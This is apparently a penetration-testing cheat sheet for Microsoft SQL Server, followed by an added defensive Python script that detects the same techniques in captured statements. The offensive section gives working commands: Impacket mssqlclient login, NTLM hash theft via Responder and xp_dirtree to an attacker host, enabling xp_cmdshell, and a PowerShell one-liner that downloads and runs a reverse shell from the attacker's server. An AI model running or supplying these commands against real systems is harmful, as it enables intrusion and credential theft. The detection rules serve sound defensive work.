Microsoft SQL Server
MSSQL is a relational database management system from Microsoft. As a database server, its primary function is storing and retrieving data for other application software. SQL is used to create and manage the database.
Shells
If you have credentials you can use a tool from Impacket, mssqlclient.py.
Since MSSQL is a normal Microsoft service, your goal should be to get a shell with something like Netcat and then try to escalate privileges, for example with a tool like WinPEAS.
MSSQLclient.py
This is a tool created to get a shell on an MSSQL server. The usage is pretty basic; here is the most common syntax.
impacket-mssqlclient -db volume -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
You can ignore the -db option if you don't know the name of the database on the server. After logging in you will be presented with a SQL shell. The -windows-auth option enables Windows authentication; by default it is disabled. Here are a few things you can/should do as soon as you get in.
Steal NTLM Hash with Responder
sudo responder -I <interface>   # run this on your machine
SQL> exec master..xp_dirtree '\\<YOUR_RESPONDER_IP>\test'   # steal the NTLM hash, crack it with john or hashcat
Enable Remote Code Execution
First you need to enable code execution in the first place. In MSSQL that is xp_cmdshell. Then it is recommended to spawn a reverse shell like Netcat. Just host the executable for the shell on a web server on your machine, then download and run it on the MSSQL server.
SQL> enable_xp_cmdshell
SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://<YOUR IP>:<YOUR PORT>/reverse_shell.ps1") | powershell -noprofile'
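A defender-side counterpart, added here as an example and not part of the original page: a small Python scan over constructed statement text (standing in for what a SQL Server Audit or Extended Events session would record) that flags the three patterns above, a UNC path handed to a file-system extended procedure such as xp_dirtree, xp_cmdshell being switched on through sp_configure, and xp_cmdshell being executed. The rule names and sample statements are my own.

```python
import re

# Constructed sample of captured T-SQL statements, standing in for the
# statement text a SQL Server Audit or Extended Events session would record.
SAMPLE_STATEMENTS = [
    "SELECT name FROM sys.databases",
    "exec master..xp_dirtree '\\\\10.0.0.5\\test'",
    "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;",
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    "EXEC xp_cmdshell 'whoami'",
    "EXEC master..xp_fileexist 'C:\\temp\\a.txt'",
]

# Extended procedures that make the SQL Server service account open a path;
# a UNC target forces an outbound SMB authentication from the server.
FILE_XPS = r"xp_(?:dirtree|fileexist|subdirs|getfiledetails)"

RULES = [
    # file XP whose first argument starts with \\host (local paths are ignored)
    ("unc_path_to_file_xp",
     re.compile(FILE_XPS + r"\s+'\\\\[^'\\]+", re.IGNORECASE)),
    # sp_configure flipping xp_cmdshell to 1 (mssqlclient's enable_xp_cmdshell
    # helper sends exactly this kind of statement to the server)
    ("xp_cmdshell_enabled",
     re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.IGNORECASE)),
    # an actual OS command run through xp_cmdshell
    ("xp_cmdshell_executed",
     re.compile(r"\bxp_cmdshell\s+'", re.IGNORECASE)),
]


def classify(statement):
    """Return the names of the rules that match one captured statement."""
    return [name for name, rx in RULES if rx.search(statement)]


def scan(statements):
    """Return (index, rule, statement) for every hit, in capture order."""
    return [(i, name, s)
            for i, s in enumerate(statements) for name in classify(s)]


if __name__ == "__main__":
    for i, rule, stmt in scan(SAMPLE_STATEMENTS):
        print(f"[{rule}] statement {i}: {stmt}")
```

Only the UNC-path call, the sp_configure change and the xp_cmdshell execution are flagged; the benign SELECT, the 'show advanced options' change and the local-path xp_fileexist are not.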